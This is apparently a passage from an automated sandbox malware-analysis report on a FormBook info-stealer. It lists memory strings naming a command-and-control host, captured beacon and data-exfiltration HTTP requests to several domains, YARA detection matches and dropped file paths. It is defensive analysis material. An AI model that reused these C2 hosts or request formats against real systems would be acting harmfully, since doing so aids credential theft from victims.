Source: wscript.exe, 0000000F.00000002.799686175.0000023E30EB0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre7
Source: wscript.exe, 00000006.00000003.756744181.000001A548027000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.757322682.000001A548027000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre783C6-CB41-11D1-8B02-00600806D9B6
Source: wscript.exe, 0000000C.00000003.456284236.0000010D38441000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre?9
Source: wscript.exe, 0000000F.00000002.804301377.0000023E30F42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreA2
Source: wscript.exe, 00000001.00000003.384485036.000001B74541E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384967035.000001B745438000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreDENTIFIER=Intel64
Source: wscript.exe, 00000001.00000003.384997666.000001B74540D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384897364.000001B745406000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreE-8C82-00AA004BA90B
Source: wscript.exe, 00000006.00000003.436368850.000001A547FEF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreEa
Source: wscript.exe, 0000000F.00000002.799686175.0000023E30EB0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreI
Source: wscript.exe, 00000006.00000003.436368850.000001A547FEF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreIER=Intel64
Source: wscript.exe, 00000001.00000002.797140717.000001B744CB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.788082971.000001A547F80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.799403511.0000010D37DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.798112054.0000023E30EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreKTsNClZO
Source: wscript.exe, 00000001.00000002.815158211.000001B7453E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.797140717.000001B744CB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.574241305.000001A546126000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.574495089.000001A546128000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.436100065.000001A547FB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.788082971.000001A547F80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.788220340.000001A547FB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.615529127.0000010D35F31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.799403511.0000010D37DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.615417763.0000010D35F2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.614567898.0000023E2EF58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.616305170.0000023E2EF5B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.804264808.0000023E30F15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.798112054.0000023E30EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreM
Source: wscript.exe, 0000000C.00000002.799462457.0000010D383C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreMTf
Source: wscript.exe, 0000000F.00000002.804264808.0000023E30F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreMjo
Source: wscript.exe, 0000000C.00000002.799462457.0000010D383C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreMrf_
Source: wscript.exe, 00000006.00000003.436056290.000001A547F92000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreN
Source: wscript.exe, 00000001.00000002.797140717.000001B744CB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.788082971.000001A547F80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.799403511.0000010D37DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.798112054.0000023E30EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VrePSAiQ2wi
Source: wscript.exe, 00000006.00000002.788393947.000001A54800C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreQa
Source: wscript.exe, 0000000F.00000002.804301377.0000023E30F42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreV2
Source: wscript.exe, 00000001.00000002.797140717.000001B744CB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.799403511.0000010D37DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.798112054.0000023E30EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreYXIgaXQg
Source: wscript.exe, 0000000C.00000002.799462457.0000010D383C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreZ
Source: wscript.exe, 0000000C.00000003.456284236.0000010D38441000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreZ6
Source: wscript.exe, 00000006.00000002.788082971.000001A547F80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.799403511.0000010D37DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.798112054.0000023E30EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreZXBsYWNl
Source: wscript.exe, 00000001.00000002.797140717.000001B744CB0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreZXBsYWNlrr
Source: wscript.exe, 00000001.00000002.797140717.000001B744CB0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreZigpIHsN
Source: wscript.exe, 00000006.00000002.788082971.000001A547F80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.799403511.0000010D37DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.798112054.0000023E30EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreZigpIHsNrr
Source: wscript.exe, 00000006.00000003.574065637.000001A548036000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.573367613.000001A54800B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre_ndefender://%ProgramFiles%
Source: wscript.exe, 00000001.00000002.797140717.000001B744CB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.788082971.000001A547F80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.799403511.0000010D37DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.798112054.0000023E30EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreadkhan.d
Source: wscript.exe, 00000001.00000002.797140717.000001B744CB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.788082971.000001A547F80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.799403511.0000010D37DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.798112054.0000023E30EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreadkhan.duu
Source: wscript.exe, 00000006.00000002.788082971.000001A547F80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.799403511.0000010D37DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.798112054.0000023E30EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VrebWcgPSAi
Source: wscript.exe, 0000000F.00000002.804315845.0000023E30F5B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrec&
Source: wscript.exe, 00000001.00000003.384485036.000001B74541E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384967035.000001B745438000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vredir=C:
Source: wscript.exe, 0000000F.00000003.614567898.0000023E2EF58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.615434435.0000023E2EF6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.615093241.0000023E2EF6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VrelderViewDual2WWW
Source: wscript.exe, 00000001.00000002.786905329.000001B742D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.788120944.000001A547F90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.788325746.0000023E2EE92000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrenter2
Source: wscript.exe, 0000000C.00000002.799462457.0000010D383C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrenter2oft6
Source: wscript.exe, 00000001.00000002.815158211.000001B7453E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.801731870.000001B7453A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.788120944.000001A547F90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.799462457.0000010D383C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.614567898.0000023E2EF58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.616305170.0000023E2EF5B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreo
Source: wscript.exe, 00000006.00000002.788120944.000001A547F90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreoH
Source: wscript.exe, 0000000F.00000002.804264808.0000023E30F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreoKo
Source: wscript.exe, 00000001.00000003.384955138.000001B742E0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreoftows
Source: wscript.exe, 00000001.00000003.384727755.000001B7453C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrerd
Source: wscript.exe, 0000000F.00000002.804264808.0000023E30F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrerwl
Source: wscript.exe, 00000001.00000002.797140717.000001B744CB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.788082971.000001A547F80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.799403511.0000010D37DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.798112054.0000023E30EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vres2
Source: wscript.exe, 00000001.00000003.384727755.000001B7453C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrex.
Source: explorer.exe, 00000004.00000000.332347310.000000000DDE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.369067686.000000000DDE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.398054768.000000000DDE9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.microsoft.co
Source: cmmon32.exe, 00000012.00000002.837908530.0000000005BFB000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.o7oiwlp.xyz
Source: cmmon32.exe, 00000012.00000002.837908530.0000000005BFB000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.o7oiwlp.xyz/np8s/
Source: wscript.exe, 00000006.00000003.757128359.000001A547FB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.436100065.000001A547FB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.757440030.000001A547FD6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.573645554.000001A547FB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.574280923.000001A547FB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.788220340.000001A547FB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.615176413.0000010D38418000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.799462457.0000010D383C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.615795010.0000023E30F15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.804264808.0000023E30F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: wscript.exe, 00000001.00000002.815158211.000001B7453E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.714217538.000001B7453C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com;
Source: cmmon32.exe, 00000012.00000002.827061760.0000000005582000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.interlink-travel.com/np8s/?Bl=lHUDzXfpVJ_&c2MH6DeP=O5u6OlqxnDtTF3riQ4xVZIWxoHxK/fTzbXBC7
Source: unknown HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.liveafunday.xyzConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.liveafunday.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.liveafunday.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 38 30 47 79 45 65 41 62 30 69 74 45 28 79 79 55 45 61 45 58 76 6b 68 67 42 43 35 79 79 46 73 6f 50 48 47 74 62 6c 7a 6d 6d 37 37 55 6b 31 37 59 76 46 31 4d 5a 61 4c 57 32 35 56 70 68 6b 79 6e 51 31 7a 50 39 59 5a 44 6a 45 64 7a 31 42 4e 58 54 68 6c 31 58 6f 72 41 43 70 30 6b 68 61 52 56 30 56 51 56 73 66 4d 56 61 75 4f 6a 45 36 4d 71 34 6f 67 69 55 31 59 59 72 4c 69 78 50 4e 39 6b 54 33 49 43 30 4e 6e 72 4c 31 61 36 6a 62 55 53 61 6e 70 6b 55 52 54 56 5a 6c 37 32 75 39 64 45 79 51 78 65 4a 31 46 65 79 58 4a 51 75 73 4b 4d 37 33 43 4a 45 31 47 48 42 63 44 36 45 67 78 69 68 52 6f 6d 44 4a 52 33 30 30 4d 65 58 31 38 77 32 30 5a 59 43 47 77 37 72 45 61 69 6a 58 41 44 71 76 58 61 77 30 6b 58 39 6b 35 68 79 5a 75 6f 6a 33 28 68 42 38 6f 6c 41 49 66 33 38 36 4b 32 57 48 48 4c 68 73 33 68 72 47 51 48 73 44 64 44 58 5f 4e 32 51 36 4b 5a 43 54 30 66 50 62 76 68 56 4f 48 4e 61 74 6d 63 32 62 28 44 54 34 53 47 58 7a 30 5f 69 65 77 6d 38 4c 7a 58 51 41 79 7a 66 72 4c 41 33 78 53 35 33 4c 67 4e 38 5a 63 78 44 6d 69 68 56 65 75 42 41 6f 7a 4d 52 33 78 4a 35 71 6c 6a 33 6b 36 45 4f 35 77 46 53 79 61 4a 6c 7a 34 4b 67 74 61 4f 50 37 79 59 35 49 35 6c 6d 5a 43 65 62 54 39 53 42 32 46 55 51 4c 77 4f 79 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: c2MH6DeP=80GyEeAb0itE(yyUEaEXvkhgBC5yyFsoPHGtblzmm77Uk17YvF1MZaLW25VphkynQ1zP9YZDjEdz1BNXThl1XorACp0khaRV0VQVsfMVauOjE6Mq4ogiU1YYrLixPN9kT3IC0NnrL1a6jbUSanpkURTVZl72u9dEyQxeJ1FeyXJQusKM73CJE1GHBcD6EgxihRomDJR300MeX18w20ZYCGw7rEaijXADqvXaw0kX9k5hyZuoj3(hB8olAIf386K2WHHLhs3hrGQHsDdDX_N2Q6KZCT0fPbvhVOHNatmc2b(DT4SGXz0_iewm8LzXQAyzfrLA3xS53LgN8ZcxDmihVeuBAozMR3xJ5qlj3k6EO5wFSyaJlz4KgtaOP7yY5I5lmZCebT9SB2FUQLwOyg).
Source: unknown DNS traffic detected: queries for: dilshadkhan.duia.ro
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=hgAcLcCQcJ9fw2P/Tuk0sK1oy/IuL6u1zsG1wPPsT2rq6CikgixxXMntvJFJ21PsUjiZ&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.brandpay.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=SjFSW0qH8X1Gu/+4r88YNPSLQa2KKx1h4LPt291Cc0nRXdmgbio7b0swgPTE4uOj94VU&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.brawlhallacodestore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEPodkGcNW4yt&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.topings33.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=z2yIa7cx1SROgCPUWMRj7QFmCzRewXUzLnClNkjkn7TUjkjwrW0kK9KMlL9EtH2oI1i9&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.liveafunday.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=cDXfWuCokJFrdCwhVntnDB+RdogU7uBP5U/Sv42Lexzi+FyRpCsvSOHB1ClRHn4SxuGj&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.siberup.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=vlrq3Iq6CNBS64Mt3AOFKZFqCoQQX/EcbdCgZyJL/t2S6EN96XJkdyy29bgYyDpdikhs&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.kishanshree.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=vlrq3Iq6CNBS64Mt3AOFKZFqCoQQX/EcbdCgZyJL/t2S6EN96XJkdyy29bgYyDpdikhs&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.kishanshree.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=vlrq3Iq6CNBS64Mt3AOFKZFqCoQQX/EcbdCgZyJL/t2S6EN96XJkdyy29bgYyDpdikhs&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.kishanshree.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=pvCvVC1srqMzTu3vjZ/Pi4S7puQ7WYlroZs2vwEH9SE4BkgUF4SEMyF7QpXUX37idvZ6&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.rasheedabossmoves.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=Wi2RbeLHGdcMG/4zbWZrHjxVNTurLVF13zSFjScR2hfe23jELpoygCvTVMXCwbd5YdLw&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.o7oiwlp.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=OAQ8ZAk71VYHsoGBQeS0cLLvyBMKMlAsSK0ta2CkcQgnl+jMatCDHwZEkCDKr1q9/u4Y&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.ratebill.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=SaZV+ETfGqRGg8UpLQ9gT5lpaRa7t1Wyj9mLK06zGilC1KjP8kiErJAXediVB/P9DJGG&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.2264a.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=sGHpREHB6zr3UC4aQViiUpNRv9hYNnMtmn0rCl8QdyZ+urDz6JFWhhwh7EVf+dC28syJ&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.heavymettlelawyers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=O5u6OlqxnDtTF3riQ4xVZIWxoHxK/fTzbXBC76K0hST926FmxCw4JGrgecy53rLpUaVG&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.interlink-travel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?Bl=lHUDzXfpVJ_&c2MH6DeP=O5u6OlqxnDtTF3riQ4xVZIWxoHxK/fTzbXBC76K0hST926FmxCw4JGrgecy53rLpUaVG HTTP/1.1Host: www.interlink-travel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?Bl=lHUDzXfpVJ_&c2MH6DeP=Wi2RbeLHGdcMG/4zbWZrHjxVNTurLVF13zSFjScR2hfe23jELpoygCvTVMXCwbd5YdLw HTTP/1.1Host: www.o7oiwlp.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEPodkGcNW4yt&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.topings33.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?Bl=lHUDzXfpVJ_&c2MH6DeP=z2yIa7cx1SROgCPUWMRj7QFmCzRewXUzLnClNkjkn7TUjkjwrW0kK9KMlL9EtH2oI1i9 HTTP/1.1Host: www.liveafunday.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=Wi2RbeLHGdcMG/4zbWZrHjxVNTurLVF13zSFjScR2hfe23jELpoygCvTVMXCwbd5YdLw&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.o7oiwlp.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=OAQ8ZAk71VYHsoGBQeS0cLLvyBMKMlAsSK0ta2CkcQgnl+jMatCDHwZEkCDKr1q9/u4Y&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.ratebill.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.bin.exe.b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.5hol_r7nkdhp.exe.c50000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.5hol_r7nkdhp.exe.c50000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bin.exe.b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.5hol_r7nkdhp.exe.c50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.5hol_r7nkdhp.exe.c50000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.283279518.000001E33FDAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.368626097.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.441172214.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.817738228.0000000005407000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.787729752.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.781550005.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.283050957.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.806764391.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.397676948.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.440060149.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.780941454.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.780550493.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.286506040.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.441024809.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.806738334.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.293804379.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.283509737.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.284654374.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.806579092.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.781223568.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.298399545.000001E34090B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Cex8di\5hol_r7nkdhp.exe, type: DROPPED

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 2.2.bin.exe.b0000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.bin.exe.b0000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 40.0.5hol_r7nkdhp.exe.c50000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 40.0.5hol_r7nkdhp.exe.c50000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 40.0.5hol_r7nkdhp.exe.c50000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 40.0.5hol_r7nkdhp.exe.c50000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.bin.exe.b0000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.bin.exe.b0000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 40.0.5hol_r7nkdhp.exe.c50000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 40.0.5hol_r7nkdhp.exe.c50000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
